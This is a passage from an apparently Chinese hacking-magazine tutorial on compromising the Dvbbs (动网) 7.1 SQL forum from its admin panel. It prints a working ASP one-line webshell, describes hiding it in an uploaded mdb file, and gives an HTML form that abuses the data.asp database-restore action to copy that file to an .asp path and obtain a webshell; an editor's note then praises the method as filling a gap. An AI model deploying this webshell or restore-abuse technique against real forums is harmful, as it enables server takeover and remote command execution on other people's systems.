然后在前台发帖或编辑帖子来上传ASP一句话与空数据库合并的mdb文件（可以使用蓝鱼动网空数据库合并器合并），ASP一句话的代码为●<%if request("cmd")<>"" then execute request("cmd")%>●。上传后在帖子处是不可以直接看到路径的，要到后台里去找。在后台依次找到“文件管理”—“上传文件管理”— “开始搜索”，找到刚才上传的mdb文件，如图10。



得知mdb文件的相对路径为UploadFile/2007-9/2007912123062511.mdb。将以下代码保存为HTML文件：
★
<form action="http://127.0.0.1/admin/data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置：<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>
★
由于动网7.1 SQL版的后台是不可以直接恢复数据库的，所以要用这个HTML来调用执行恢复数据库操作。保存好后打开，在“已上传文件的位置”填入“.. /UploadFile/2007-9/2007912123062511.mdb”，在“要复制到的位置”填入“../UploadFile/2007 -9/test.asp”（此处填需要导出的Webshell路径），然后点击“提交”，如图11。



提交后返回“成功恢复数据！”，如图12。使用一句话木马的客户端连接http://127.0.0.1/UploadFile/2007-9/shell.asp，成功得到Webshell，如图13。





剩下的就教给各位自己去玩了。至此漏洞的详细利用和后台如何获取Webshell的方法就已经介绍完毕，如果有什么问题的话，欢迎到X官方论坛与我交流。

小编点评：
动网始终是“洞网”，上期刚暴了8.0 SQL版的致命漏洞，现在又来了7.1 SQL版的漏洞！漏洞的利用却都是如此之简单，轻松地利用工具就可以得到论坛的管理员权限，然后拿到Webshell，甚至危及到整个服务器的安全！动网 7.1 SQL版在后台如何得到Webshell的方法在以前的杂志上似乎并没有怎么详细地介绍过，本文详细说明了漏洞的利用过程及动网7.1SQL版后台拿 Webshell的具体方法，正好填补了这一空白。

上一页  [1] [2] [3]